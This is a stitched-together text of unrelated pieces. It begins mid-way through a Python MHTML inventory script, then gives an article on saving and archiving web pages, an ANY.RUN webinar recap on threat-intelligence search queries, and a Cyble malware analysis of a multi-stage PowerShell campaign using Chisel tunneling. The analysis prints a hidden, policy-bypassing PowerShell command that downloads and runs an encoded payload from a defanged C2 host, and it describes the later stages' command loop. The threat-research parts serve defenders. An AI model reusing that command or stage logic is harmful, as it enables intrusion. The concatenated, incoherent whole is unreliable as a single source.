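        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            return part.get_payload(decode=True).decode(charset)
    return None

if __name__ == "__main__":
    for p in inventory(SAMPLE_MHTML):
        flags = ("script " if p["is_script"] else "") + ("cross-origin" if p["cross_origin"] else "")
        print(f'{p["type"]:16} {p["size"]:6} {p["location"]}  {flags}')
```

Run against a real .mhtml from your browser, the same inventory shows which third-party scripts and trackers were bundled into the snapshot; if you only want the content, the "Print to PDF" route above or stripping the script parts before archiving avoids re-executing them later.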

An easier way to save a web page

The methods described above are a bit time-consuming and create clutter on your hard drive. For greater convenience, use a dedicated service such as Pocket (formerly Read It Later), wallabag, or Raindrop.io. They all work the same way: you send a link from which the service retrieves a document with all the illustrations, cleans the page of anything unnecessary, and saves it in your personal online storage. Even if the original page gets deleted or modified, the version you want will remain in your archive. These services allow you to group and sort your links, search for text inside, and view your saved pages on any device. For desktop, there’s an extension available for all the major browsers; and for mobile, there’s an app.

All these services offer an "eternal" archive only with a premium subscription, meaning you'll have to pay for the convenience. That said, wallabag is open-source: you can install it on your own server and neither pay for third-party services nor worry about the service getting shut down.

Some note-taking apps can also save complete web pages. These include Evernote, where the feature is called “Web Clipper”.

How to save a web page for others

If it’s not just a copy for yourself that you need, but to share a certain version of the page with others, you’ll need a public-archiving service.

The best-known is the Internet Archive (archive.org) and its Wayback Machine. Other options include archive.today (aka archive.is), perma.cc, and megalodon.jp. They all work on a similar principle: either at the user’s request or automatically they visit web pages and save a copy on their servers.

To request archiving of a web page, go to web.archive.org and enter the full address in the Save Page Now box. After you click Save, a window appears describing all of the page’s loaded components, followed by a permanent link to the site in its preserved state. It looks like this: https://web.archive.org/web/20240924045754/https://www.kaspersky.com/blog. The link shows both the address of the saved page and the exact time of saving — perfect for archival purposes.

Registering on archive.org lets you manage a collection of such links, take screenshots of saved sites, and download copies of them in the WARC web-archiving format.

On archive.org, you can view previously saved versions of websites and save the current state of any site — for example, our blog

On opening the archive link, you'll see the saved page with a timestamp indicating when the snapshot was taken. This feature is useful for tracking and demonstrating changes in website data: price fluctuations, product description updates, edited news reports, and deleted information. The latter is particularly important for historical and cultural researchers whose work relies on defunct websites. Below, you can check out one of the first versions of GeoCities, a once popular web-hosting service that let you create "home pages", express yourself, and find friends with shared interests long before social networks. It's only thanks to the Wayback Machine that we can see it now: the site closed shop in 2009.

A gift for the old-timers: one of the earliest versions of GeoCities.com

How to find deleted internet content or an old version of a website

To view an old version of any website:

  • Open archive.org.
  • Enter the full address of the website or a specific page in the box next to the logo and press Enter. If the exact URL is unknown, you can enter the name of the website or words that describe it well.
  • Select the desired website from the list. The results show at a glance how many copies are archived and for what period.
  • Use the calendar to select which of the saved copies of the site you wish to view. Dates for which there is a saved copy are circled — the larger the circle, the more copies were made that day.
  • Click the desired date and inspect the saved site. Note that loading a copy from the archive may take a few minutes.
  • The calendar graph above the site copy lets you navigate to older and newer copies.

How to explore old versions of sites at web.archive.org

You can copy the link to the retrieved copy from the address bar to access the archived site directly, bypassing the search interface.

What if archive.org can’t help

The foundation behind archive.org sometimes complies with the requests of copyright holders and other authorized parties to exclude certain sites from the Wayback Machine. Also, the service never aimed to preserve the entire internet, so it may happen that the page you need was never indexed. In such cases, try looking for it in other time capsules.

Archive.today (aka archive.is) doesn’t automatically save pages — it does so only at the request of users. Among other things, this does away with having to follow instructions for search robots (robots.txt), and means that the archive contains documents that aren’t available in the Wayback Machine.

Another important web-archiving project is perma.cc, created by a consortium of major world libraries. However, it’s only free for participating organizations. Individual users can subscribe to a paid plan, with pricing based on the number of archived links.

A powerful alternative to specialized archives is search engines’ cached content. To index any web page, search engines retrieve its text, so a crude but readable version of almost any page can be found there. For a long time, Google’s cache was the most accessible, but in early 2024, the search giant removed the direct link to its cache from search results. The service still works, but accessing it directly is very difficult.

Therefore, it’s better to use browser extensions that make internet archives easier to work with. For example, if a link takes you to a deleted page or a defunct website, the Web Archives extension redirects you straight to an archived copy of this page at web.archive.org, archive.today, or perma.cc, or shows a cached version of it from Google, Bing, or Yandex.

How to save data from other online services

Besides web pages, there are many other online services — from photo albums and notes to social networks — that hold data you also may want to save. Of course, recommendations vary for different types of data and specific services, but for your convenience, we’ve grouped all related instructions under the backup tag. You can read about creating backups for:

And don’t forget to safeguard your backups against ransomware and spyware!

How to Improve Threat Investigations with TI Lookup: Webinar Recap 

On October 23, we hosted a webinar “How to Improve Threat Investigations with TI Lookup”. The session was led by Dmitry Marinov, CTO at ANY.RUN, who showed the audience effective methods for collecting the latest threat intelligence. 

Here is a quick rundown of the main topics and examples of investigations covered during the event. 

What is Threat Intelligence Lookup 

Threat Intelligence (TI) Lookup is a centralized service for threat data exploration, collection, and analysis. It contains fresh threat data extracted from public malware and phishing samples uploaded to ANY.RUN’s Interactive Sandbox over the past 180 days. Each search request you make returns results that provide expanded context related to the threat data in your query. 

Key features of TI Lookup include: 

  • Search results take just 5 seconds for events spanning the last six months. You can quickly get in-depth information about how events work, whether they are linked to a threat, and how they are related to that threat. 
  • With over 40 search parameters, TI Lookup provides examples and context from other investigations to help with decision-making. Unlike other solutions where you can work only with IOCs, Lookup can search among events and YARA rules, which is extremely helpful. 
  • TI Lookup has a large amount of data from the ANY.RUN sandbox, where cybersecurity analysts from around the world analyze threats. New samples are uploaded and analyzed daily, providing data that you cannot find in any other open sources. 

How TI Lookup Sources Data 

A core component of the suite is the Public submissions database. It is a vast repository that houses millions of unique malware and phishing samples submitted daily by a global community of over 500,000 security professionals from different spheres and industries using ANY.RUN. 

Every time a user runs a public analysis in the sandbox, the systems capture the key data from that analysis. This data is then immediately sent to Threat Intelligence Lookup. As a result, Threat Intelligence Lookup becomes a centralized hub where you can search through threat data extracted from millions of malware and phishing analysis sessions launched in the ANY.RUN sandbox. 

How TI Lookup Works 

Let’s say we want to collect the latest domains used by threat actors that utilize Lumma, a notorious malware infostealer.  

To do this, we can submit the following search request: threatName:"lumma" AND domainName:""

  • The first part of the query, threatName:"lumma", instructs the search engine to find sandbox sessions where Lumma was detected.
  • The second part of the query, domainName:"", tells the system to retrieve all domain names identified in those sandbox sessions. The empty value acts as a wildcard, indicating that you are interested in all domain names associated with the threat.

The service returns numerous domains that match our request. At the top, you can see domains with the malconf tag, which tells you that these domains were extracted directly from the configs of Lumma samples, the most reliable source of indicators of compromise. We can easily copy each indicator or download all of them in JSON format. 

As you can see, apart from domains, the service also provides a large number of other types of indicators, including events, files, URLs, and others. That’s one of TI Lookup’s unique advantages – the diversity of data it provides. 

Use Cases of TI Lookup 

To demonstrate how TI Lookup can be used in real-world investigations, Dmitry outlined several use cases where the service can be particularly useful. 

Checking a Suspicious IP Address 

One of the most straightforward use cases is identifying threats using a suspicious IP address. For example, if you receive an alert about a connection to a suspicious IP address (e.g., 162.254.34.31) coming from one of the machines on your network, TI Lookup can quickly check if this IP address has been used in other malware attacks. 

The service marks the queried IP address as malicious and offers extra context 

By entering the query destinationIP:"162.254.34.31", the service identifies the IP address as malicious and links it to AgentTesla.

TI Lookup provides a list of sandbox sessions where the IP address was detected 

It also provides related indicators, including processes, files, and most importantly, sandbox sessions where you can see the analysis of actual attacks and collect more data. 

Identifying a Malware Family Using a Mutex 

Another way to use TI Lookup is to identify a threat by using unique indicators such as mutexes. For instance, you can use mutexes to identify the Remcos malware.

Synchronization events found in TI Lookup’s database with corresponding sandbox sessions 

By entering the query syncObjectName:"RMC-", the service shows specific mutexes and provides a list of sandbox sessions to explore the threat further.


Uncovering a Threat Using a File Path 

You can also find threats using a file path.  

The service provides a list of files that match the query and events with the tag “darkvision” 

For example, a search for filePath:"\Start Menu\Programs\Startup\{*}.lnk" reveals that this file path has been observed in sessions featuring the DarkVision RAT.

The service also returns Suricata IDS rules triggered in relation to the requested files’ activity 

This allows you to see the context and related sandbox sessions for further investigation. 

Connecting Unrelated Data Points 

One of the most powerful features of TI Lookup is its ability to connect pieces of data that may seem unrelated. Consider a scenario where you have a command line artifact and a network artifact.

The command line artifact might be commandLine:"timeout /t 5 & del", which indicates a command that delays execution for 5 seconds and then deletes a file. The network artifact might be destinationIP:"185.215.113.37", which represents an IP address that the system is communicating with.

TI Lookup generates relevant results, offering instant threat context  

By combining these indicators into a single query, commandLine:"timeout /t 5 & del" AND destinationIP:"185.215.113.37", you can zoom in on the threat you're dealing with.

Malicious IP addresses found by the service 

The service provides plenty of context and shows that the malware in question is StealC. Some of the additional indicators provided include malicious IPs and URLs, which were used in StealC attacks. 

You can always go back to the source by navigating to a sandbox session of your interest to observe the threat’s behavior, and even rerun the analysis using your own VM settings. 
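To make the query semantics used in the Lumma example and in the combined query above concrete (a field:"value" term, an empty value acting as a wildcard, and AND joining terms), here is an added example that evaluates such queries against a few constructed sandbox-session records. It is a local model written for this recap, not ANY.RUN's search engine; it assumes case-insensitive substring matching for non-empty values, and the session records and .invalid domains are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sandbox-session records (not ANY.RUN data). Each field maps to
# the list of values observed in that session. Domains use .invalid names;
# the two IP addresses are the ones discussed in the recap.
SESSIONS = [
    {"id": "constructed-1", "threatName": ["lumma"],
     "domainName": ["example-a.invalid", "example-b.invalid"],
     "destinationIP": ["192.0.2.10"]},
    {"id": "constructed-2", "threatName": ["lumma"]},  # no domains observed
    {"id": "constructed-3", "threatName": ["agenttesla"],
     "domainName": ["example-c.invalid"], "destinationIP": ["162.254.34.31"]},
    {"id": "constructed-4", "threatName": ["remcos"],
     "syncObjectName": ["RMC-0123456789ABCDEF"]},
    {"id": "constructed-5", "threatName": ["stealc"],
     "commandLine": ["cmd /c timeout /t 5 & del dropper.exe"],
     "destinationIP": ["185.215.113.37"]},
]

TERM_RE = re.compile(r'(\w+):"([^"]*)"')
# Queries pasted from blog posts often carry smart quotes; normalise them.
CURLY = {"\u201c": '"', "\u201d": '"', "\u2033": '"'}


def parse_query(query: str) -> List[Tuple[str, str]]:
    """Turn field:"value" terms joined by AND into (field, value) pairs."""
    for bad, good in CURLY.items():
        query = query.replace(bad, good)
    terms = TERM_RE.findall(query)
    leftover = TERM_RE.sub(" ", query).split()  # only AND may remain
    if not terms or any(tok.upper() != "AND" for tok in leftover):
        raise ValueError(f"unsupported query: {query!r}")
    return terms


def term_matches(session: Dict, field: str, value: str) -> bool:
    """Empty value = wildcard (field must be present); otherwise substring."""
    observed = session.get(field, [])
    if value == "":
        return bool(observed)
    return any(value.lower() in v.lower() for v in observed)


def run_query(query: str, sessions=SESSIONS) -> Dict:
    """Return matching session ids plus, for wildcard fields, the values found."""
    terms = parse_query(query)
    hits = [s for s in sessions if all(term_matches(s, f, v) for f, v in terms)]
    collected = {fld: sorted({x for s in hits for x in s.get(fld, [])})
                 for fld, val in terms if val == ""}
    return {"sessions": [s["id"] for s in hits], "collected": collected}


if __name__ == "__main__":
    # The Lumma use case: every domain seen in sessions where Lumma was detected.
    print(run_query('threatName:"lumma" AND domainName:""'))
```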

Collecting Fresh Samples with YARA Rules 

Another handy feature of TI Lookup is YARA Search. Thanks to the built-in editor, you can create, edit, store, and use YARA rules to find samples that match them.  

The YARA rule searches TI Lookup's database for matching samples

For example, using a YARA rule for AgentTesla, which is available by default in TI Lookup, the search returns numerous files that can be filtered by date. You can explore each result in detail by clicking on them and navigating to the sandbox session where it was detected.

You can also download a JSON file containing file hashes along with links to corresponding sandbox sessions. 

Conclusion 

The webinar gave a detailed look at TI Lookup, showing how it can help improve threat investigations. The tool’s ability to provide fast results, offer a wide range of search options, and give access to real samples and the latest data makes it very useful for cybersecurity professionals.

Stay tuned for more webinars from ANY.RUN by following us on social media like X, Facebook, and Discord. Subscribe to ANY.RUN’s YouTube channel for the upcoming release of a video recording of the webinar.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Request free trial of ANY.RUN’s products →

The post How to Improve Threat Investigations with TI Lookup: Webinar Recap appeared first on ANY.RUN's Cybersecurity Blog.

Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign

Chisel, Malware

Key Takeaways

  • Cyble Research and Intelligence Lab (CRIL) has identified a sophisticated campaign employing PowerShell in a multi-stage infection process. 
  • The attack initiates with a suspicious LNK file, which activates a PowerShell script designed to download and execute malicious payloads. This layered strategy enhances stealth, evades detection, and ensures prolonged persistence within the target system. 
  • In the first stage, the LNK file runs an initial remote obfuscated PowerShell script that establishes persistence by deploying and executing a secondary PowerShell script and batch files. 
  • The second-stage PowerShell script continues communication with the command-and-control (C&C) server and executes a third-stage PowerShell script. 
  • The third and final stage PowerShell script sends requests for command chains and includes routines to execute received commands as directed by the C&C server. 
  • An analysis of the Network infrastructure reveals the presence of a Chisel DLL, suggesting the Threat Actor (TA) may leverage the Chisel client for further C&C communications and to enable lateral movement operations within the compromised network.
  • The TA also likely utilizes the Netskope proxy for command and control (C&C) communication with the Chisel server.

Executive Summary

CRIL has recently identified a campaign engaging in a multi-stage infection chain. This chain employs several techniques, starting with the execution of PowerShell scripts. The campaign begins with a malicious LNK file that triggers the execution of a first-stage remote PowerShell script. This script aims to establish persistence on the victim’s system by dropping and running a second-stage PowerShell script. The second-stage script maintains communication with the C&C server, allowing it to download and execute an additional third-stage PowerShell script.

The third-stage script continuously interacts with the C&C server to receive command chains. It executes these commands based on the instructions provided, enabling a variety of malicious activities, such as data exfiltration or lateral movement. The presence of a Chisel DLL on the remote server suggests that the TA may utilize Chisel for advanced operations, including setting up a SOCKS proxy and facilitating lateral movement within the infected network, further strengthening their foothold and enabling stealthy communications.

Technical details:

The infection chain begins when the user inadvertently executes a malicious LNK (shortcut) file. However, the initial infection vector of the LNK file remains unidentified. This LNK file is crafted to run a PowerShell command, which downloads another Base64 encoded PowerShell command from the remote server and then executes it.

The PowerShell command uses techniques to bypass Windows security mechanisms, such as setting the PowerShell execution policy to "Bypass," which allows the script to run without the restrictions typically enforced by the system's security settings. Additionally, the PowerShell window is run in hidden mode, ensuring that the user sees no visual indication of the malicious activity. The PowerShell command is as follows:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -wind hid $x=wget -UseB -Ur 'hxxps://c2.innov-eula[.]com/feibfiuzbdofinza';powershell -wind hid -ep byp -e $x"

The figure below shows the property of the shortcut file.

Figure 1  – Malicious Shortcut File

The figure below displays the Base64-encoded PowerShell script, highlighting the sophisticated methods used to conceal its true functionality.

Figure 2  – Base64 Encoded PowerShell Script

This de-obfuscated PowerShell script is a sophisticated piece of code engineered to establish persistence and download a PowerShell script from the C&C server. It employs various obfuscation techniques to evade detection and execute its malicious activities stealthily. The figure below shows the de-obfuscated PowerShell script.

Figure 3 – De-obfuscated Initial PowerShell Script

First Stage PowerShell Script

In the first stage, the PowerShell script performs the following tasks:

  • Initially, the PowerShell script creates a hidden directory at "C:\Users\MalWorkstation\AppData\Roaming\Microsoft\Logs" and sets the variable "$HASH" to a seemingly random string, "bdhbzaibdiBKJBJIBDI67869686806656..". While the exact purpose of this variable is unclear, it could be a placeholder for future use.
  • To ensure secure communications, the PowerShell script sets the security protocol to TLS 1.2.
  • It then retrieves the system's hostname with the "hostname" command and obfuscates this information by converting it to a Base64-encoded string.
  • The script then attempts to retrieve the proxy settings for the specified URL, "hxxp://google.es/," and constructs the Authorization header, appending the Base64-encoded hostname.
  • If a proxy is configured on the victim's machine, it uses the proxy to send a request to "hxxps://c2.innov-eula.com/" with the constructed Authorization header. If no proxy is configured, it sends the same request directly.
  • The response from the request is stored in the $R variable, which contains a PowerShell script. This script is saved in the "Logs" folder under the filename "Log_29109314.ps1" and then executed.
  • The PowerShell script creates two batch files, “Log_29109317.bat” and “Log_29109318.bat,” in the Logs folder. The “Log_29109317.bat” file runs the “Log_29109314.ps1” script, while the “Log_29109318.bat” file moves “Log_29109317.bat” to the startup folder for persistence.

The figure below shows the content of the Logs Folder.

Figure 4  – Contents of the Folder

Second Stage PowerShell Script

The second-stage PowerShell script operates similarly to the first one, establishing a connection to the C&C server using the proxies. Once connected, it retrieves the next stage of the attack, which is a PowerShell script encoded in Base64. The script then decodes and executes this Base64-encoded PowerShell script, continuing the attack chain. The figure below shows the contents of the second-stage PowerShell script.

Figure 5 – De-obfuscated Second Stage PowerShell Script

Third Stage PowerShell Script

In the third stage, the PowerShell script performs the following tasks:

  • The PowerShell script initializes critical variables like “$CHAIN” and “$JITTER” to control its operation. The “$CHAIN” variable tracks the current status of the communication with the Command and Control (C&C) server, while “$JITTER” introduces random delays at various stages to avoid detection by security systems.
  • The script then retrieves and encodes the infected machine’s hostname in Base64 and uses it to construct a web request for the system’s proxy settings via “hxxp://google.es/”.
  • If “$CHAIN” is “0”, it prepares an Authorization header with the hostname and retrieves data from “hxxps://c2.innov-eula.com/”, using proxy settings if needed. The response is stored in “$CHAIN” to establish communication with the remote server.
  • Next, the PowerShell script checks if “$CHAIN” contains invalid characters. If it does, it resets “$CHAIN” to “0” and introduces a random delay. Otherwise, it prepares an Authorization header with “$CHAIN” and hostname and sends a request to “hxxps://c2.innov-eula.com/”.
  • The server’s response is split and stored in “$CMD”. If the command is not “WAIT,” it executes a PowerShell command encoded in “$CMD[1]”. The response is then processed and split into chunks, which are sent back to the server in multiple requests.
  • The process continues, handling each chunk until the “END” command is received. The PowerShell script is shown below.

The figure below shows the de-obfuscated third-stage PowerShell script.

Figure 6 – De-obfuscated Third Stage PowerShell Script

Open Directory

At the time of execution, we were not able to observe any commands from the C&C server. However, after checking the network infrastructure, we came across an open directory, "hxxps://credit-agricole.webdev.innov-eula[.]com", hosting the malicious LNK file along with other files, as shown in the figure below.

Figure 7 – Open Directory

Chisel

The open directory contains a suspicious file named chisolo.dll, which is identified as Chisel—a fast TCP/UDP tunneling tool written in Go. Chisel operates over HTTP and is secured via SSH. It uses a single executable for both the client and server, making it particularly effective for bypassing firewalls.

Chisel has been widely adopted by various threat actors as a powerful tunneling tool, enabling them to pivot into compromised environments with stealth and efficiency. Notable groups such as Sandworm APT, Lorenz Ransomware, and Pysa Ransomware have leveraged Chisel in their campaigns to facilitate lateral movement and maintain persistence.

The Threat Actor can leverage the Chisel tool for various malicious purposes.

Scanning the Internal Network

After compromising the system using the previously mentioned infection, the TA deploys and executes the Chisel client on the compromised machine. This allows the TA to use the infected machine as a SOCKS proxy, enabling them to scan the internal network with tools like Nmap.

Accessing Protected Internal Networks

Once the internal networks are identified, the TA can use the compromised machine to create a tunnel using the Chisel client. This tunnel provides access to networks that are otherwise shielded from external connections, allowing the TA to infiltrate internal systems not exposed to the outside.

Enabling External Connections for Isolated Machines

The TA can also leverage the Chisel client to enable internet access for machines that are otherwise unable to connect. This allows the TA to download additional malicious samples for further exploitation and maintain persistence within the network.

The Chisel client sample identified in this campaign has three export functions, as shown below.

Figure 8 – Chisel Client Export Functions

The export functions main and xlAutoOpen have code to start the Chisel client on the infected machine, as shown below.

Figure 9 – Routine to Start Chisel Client

Interestingly, the Threat Actor (TA) is using the IP address 163.116.128[.]80 over port 8080, associated with Netskope, as an explicit proxy. By routing their traffic through this Netskope proxy, we suspect that the TA is likely using this to obfuscate their communications with the C&C server – hxxps://ligolo.innov-eula[.]com.

This approach allows them to bypass traditional network defenses and evade detection, making it difficult for security teams to identify and block malicious C&C traffic. The figure below shows a code snippet used by the Chisel client containing a proxy IP address and C&C URL.

Figure 10 – Chisel Client C&C Routine

Although direct commands from the C&C server were not observed, the TA likely uses the C&C to issue commands to download and execute the Chisel client on the compromised machine. Once the Chisel tunnel is established between the C&C server and the victim’s machine, this tunnel enables the TA to control the compromised system more effectively. Through this channel, the TA can send specific commands to identify the internal network, move laterally across connected systems, and download additional malicious payloads. These actions enhance the TA’s control and facilitate further malicious activities within the internal environment. The setup effectively provides the TA with a hidden and flexible pathway into internal systems that would otherwise be isolated from external access.

Threat hunting Packages

Our exclusive threat-hunting packages include YARA and Sigma rules specifically designed to detect campaigns involving the Chisel tool and related malicious activities.

Additionally, our threat-hunting packages empower organizations to proactively identify and mitigate cyber threats, enabling them to stay ahead of cybercriminals. These packages help detect potential risks and malicious activities before they can cause harm, ensuring a stronger defense against evolving cyber threats.

We have over 15,000 threat-hunting packages and growing. To learn more about how you can gain access to our latest actionable threat intel, click here.

Conclusion

This sophisticated multi-stage PowerShell campaign uses an LNK file to activate a sequence of obfuscated scripts, which maintain persistence and ensure stealth by connecting with a command-and-control (C&C) server. The attack involves Chisel and a Netskope proxy for covert communication, enabling lateral movement within the network. This setup reflects advanced threat actor tactics aimed at prolonged control and evasion, suggesting a highly organized or financially motivated campaign.

Recommendations

  • Deploy endpoint detection and response (EDR) solutions that can identify and stop unusual PowerShell activity. Ensure that all endpoints are configured to log PowerShell command executions and unusual file behaviors, such as LNK file executions from non-standard locations.
  • Limit access to PowerShell and other scripting tools based on user roles. Where possible, apply “constrained language mode” to restrict the types of commands that can be executed.
  • Monitor network traffic for unusual connections, particularly those using uncommon ports or protocols (such as Chisel’s tunneling). Network segmentation can limit lateral movement, restricting an attacker’s access even if they compromise one segment.
  • Train users to recognize and avoid suspicious links or files, particularly those delivered via email or other messaging platforms. Regular phishing simulations and awareness training can help prevent the initial compromise.
  • Implement MFA on all sensitive systems. It can help prevent unauthorized access, even if credentials are compromised. This is especially important for privileged accounts that can execute PowerShell or access sensitive segments of the network.
  • Integrate threat intelligence feeds that include indicators of compromise (IOCs) related to C&C servers, known malicious IP addresses, and techniques like Chisel tunneling. This intelligence can aid in detecting and blocking attacks that match these patterns.

MITRE ATT&CK® Techniques

Tactic | Technique | ID | Procedure
Initial Access (TA0027) | Phishing | T1660 | The campaign starts with a suspicious LNK file that executes a PowerShell script. The script downloads and runs malicious payloads from the C2 server.
Execution (TA0041) | Command and Scripting Interpreter: PowerShell | T1059.001 | The PowerShell script executes and downloads additional malicious payloads from a remote server.
Persistence (TA0028) | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | A batch file is dropped in the startup folder.
Defense Evasion (TA0030) | Obfuscated Files or Information | T1027 | Use of obfuscated PowerShell scripts and tunneling tools to hide activity from traditional security mechanisms.
Command and Control (TA0037) | Application Layer Protocol: Web Protocols (HTTP/S) | T1071.001 | Chisel is used to create a tunnel to the C2 server, allowing further control over the infected system.

Indicators of Compromise (IOCs)

Indicator | Indicator Type | Description
6c7636e21311a2c5ab024599060d468e03d8975096c0eb923048ad89f372469e | SHA256 | LNK file
8e812bb7fde8c451d2a5efc1a303f2512804f87f041b1afe2d20046d36e64830 | SHA256 | Log_29109314.ps1
319beca16c766f5b9f8cc4ba25f0b99f1b4769d119eb74dfd694d3f49a23a5b9 | SHA256 | Log_29109318.bat
0169283f9df2d7ba84516b3cce50d93dbb6445cc6b2201459fa8a2bc3e319ea3 | SHA256 | Log_29109317.bat
6332d328a6ddaa8f0c1b3353ee044df18e7867d80a0558823480bd17c14a24bc | SHA256 | Chisel DLL
hxxps://ligolo.innov-eula[.]com | Domain | C&C
hxxps://c2.innov-eula[.]com | Domain | C&C
hxxps://c2.innov-eula[.]com/feibfiuzbdofinza | URL | C&C
hxxps://credit-agricole.webdav[.]innov-eula.com/ | URL | Open directory

The post Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign appeared first on Cyble.
